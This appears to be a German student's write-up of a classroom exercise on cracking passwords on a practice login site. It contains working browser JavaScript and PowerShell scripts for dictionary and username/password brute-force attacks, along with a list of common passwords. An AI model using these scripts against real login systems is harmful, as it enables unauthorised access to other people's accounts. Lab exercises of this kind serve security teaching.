## Passwort hacken

### Aufgabe 1

Zuerst muss man eine function erstellen die verschiedene Möglichkeiten durchprobiert. Die Eingabe dafür wird eine Liste mit Passwörtern sein, die man prüfen will.

````
    index = 0;
    function tryCombinations(combinations) {
    console.log('Trying Password', combinations[index]);
    password.type = 'text';
    password.value = combinations[index];
    loginButton.click();
    index++;
    if (index < combinations.length) {
        setTimeout(tryCombinations, 500, combinations);
    }
} 
````
Danach muss man eine Liste mit den Passwörtern definieren.

````
    let dictionary = [123456, 123456789, 12345, "qwerty", "password", 12345678, 111111, 123123, 1234567890, 1234567, "qwerty123", "000000", "1q2w3e", "aa12345678", "abc123", "password1", 1234, "qwertyuiop", 123321, "password123", "1q2w3e4r5t", "iloveyou", 654321, 666666, 987654321, 123, "123456a", "qwe123", "1q2w3e4r", 7777777, "1qaz2wsx", "123qwe", "zxcvbnm", 121212, "asdasd", "a123456", 555555, "dragon", 112233, 123123123, "monkey", 11111111, "qazwsx", 159753, "asdfghjkl", 222222, "1234qwer", "qwerty1", 123654, "123abc", "asdfgh", 777777, "aaaaaa", "myspace1", 88888888, "fuckyou", "123456789a", 999999, 888888, "football", "princess", 789456123, 147258369, 1111111, "sunshine", "michael", "computer", "qwer1234", "daniel", 789456, 11111, "abcd1234", "q1w2e3r4", "shadow", 159357, "123456q", 1111, "samsung", "killer", "asd123", "superman", "master", "12345a", "azerty", "zxcvbn", "qazwsxedc", 131313, "ashley", "target123", 987654, "baseball", "qwert", "asdasd123", "qwerty", "soccer", "charlie", "qweasdzxc", "tinkle", "jessica", "q1w2e3r4t5", "asdf", "test1", "1g2w3e4r", "gwerty123", "zag12wsx", "gwerty", 147258, 12341234, "qweqwe", "jordan", "pokemon", "q1w2e3r4t5y6", 12345678910, 1111111111, 12344321, "thomas", "love", "12qwaszx", 102030, "welcome", "liverpool", "iloveyou1", "michelle", 101010, 1234561, "hello", "andrew", "a123456789", "a12345", "Status", "fuckyou1", "1qaz2wsx3edc", "hunter", "princess1", "naruto", "justin", "jennifer", "qwerty12", "qweasd", "anthony", "andrea", "joshua", "asdf1234", "12345qwert", "1qazxsw2", "marina", "love123", 111222, "robert", 10203, "nicole", "letmein", "football1", "secret", 1234554321, "freedom", "michael1", 11223344, "qqqqqq", 123654789, "chocolate", "12345q", "internet", "q1w2e3", "google", "starwars", "mynoob", "qwertyui", 55555, "qwertyu", "lol123", "lovely", "monkey1", "nikita", "pakistan", 7758521, 87654321, 147852, "jordan23", 212121, 123789, 147852369, "123456789q", "qwe", "forever", 741852963, "123qweasd", "123456abc", "1q2w3e4r5t6y", "qazxsw", 456789, 232323, 999999999, "qwerty12345", "qwaszx", 1234567891, 456123, 444444, "qq123456", "xxx"];
````

Jetzt muss man die Funktion aufrufen. Das macht man mit:

 ```` tryCombinations(dictionary);````

Nun sollten alle Passwörter in der Liste "dictionary" eingegeben werden.

Für die zweite Aufgabe brauch man eine ander Funktion:

````
let index = 0;

function emailDictionaryAttack(i, j) { // i = 0; j = 0
    console.log('Testing', emails[i], dictionary[j]);
    password.type = 'text';
    username.value = emails[i];
    password.value = dictionary[j];
    loginButton.click();

    j++;

    if (j >= dictionary.length) {
        i++;
        j = 0;
    }

    if (i < emails.length || j < dictionary.length) {
        setTimeout(emailDictionaryAttack, 20, i, j);
    }
}
````
Man muss bei der zweiten Aufgabe nocheinmal die Liste dictionary einfügen. Zusätzlich braucht man eine Liste mit den Benutzernamen:

````
let emails = [
    'albert.einstein@hacker-email.com',
    'grace.hopper@hacker-email.com',
    'marie.curie@hacker-email.com',
    'konrad.zuse@hacker-email.com',
    'stephanie-kwolek@hacker-email.com',
    'carl-friedrich.auss@hacker-email.com',
    'shirley-ann.jackson@hacker-email.com',
    'gertrude-belle.elion@hacker-email.com',
    'steve.wozniak@hacker-email.com',
    'rudolf.bayer@hacker-email.com',
    'ada.lovelace@hacker-email.com'
];
````
Jetzt muss man die Funktion aufrufen:

````
emaildictionaryAttack(0,0)
````
## Powershell:
Mit dem unten stehenden Programm, kann man mit der Hilfe eines Benutzernamens ein zugeteiltes Passwort von einer Liste herausfinden.
````Add-Type -AssemblyName System.Web

$class = "ap22d"
$URI = "https://hacksite.tho-kae.ch"
$passwords = "123456","123456789","Qwerty","Password","12345","12345678","111111","1234567","123123","Qwerty123","1q2w3e","1234567890","DEFAULT","0","Abc123","654321","123321","Qwertyuiop","Iloveyou","666666"
$users = "steiner"


function checkUserPw($username, $password)
{
    $fullURI = $URI + "/" + $class
    $urlencoded = "username=" + [System.Web.HTTPUtility]::UrlEncode($username) + "&password=" + [System.Web.HTTPUtility]::UrlEncode($password)
    $response = Invoke-WebRequest -Uri $fullURI -body $urlencoded -Method POST 
    if (($response.Images.Count -gt 0) -and ($response.Images[0].outerHTML.contains("perfect"))){
        return $true
    }
    return $false;
}

function checkUsers()
{
    foreach ($user in $users)
    {
        $passwordFound = $false

        foreach($password in $passwords)
        {       
            if (checkUserPw -user $user -password $password)
            {
                $passwordFound = $true 
                Write-Host "Passwort gefunden: $user => $password"
                continue;
            } 
        }   
    
        if ($passwordFound -ne $true)
        {
            Write-host "Kein Passwort gefunden für $user" -ForegroundColor Red -BackgroundColor Blue
        }
    }
}

checkUsers
````
## Reflexion:
Diese Aufgaben fand ich sehr spannend, aber sie waren nich alzu schwer. Ich habe es schnell verstanden.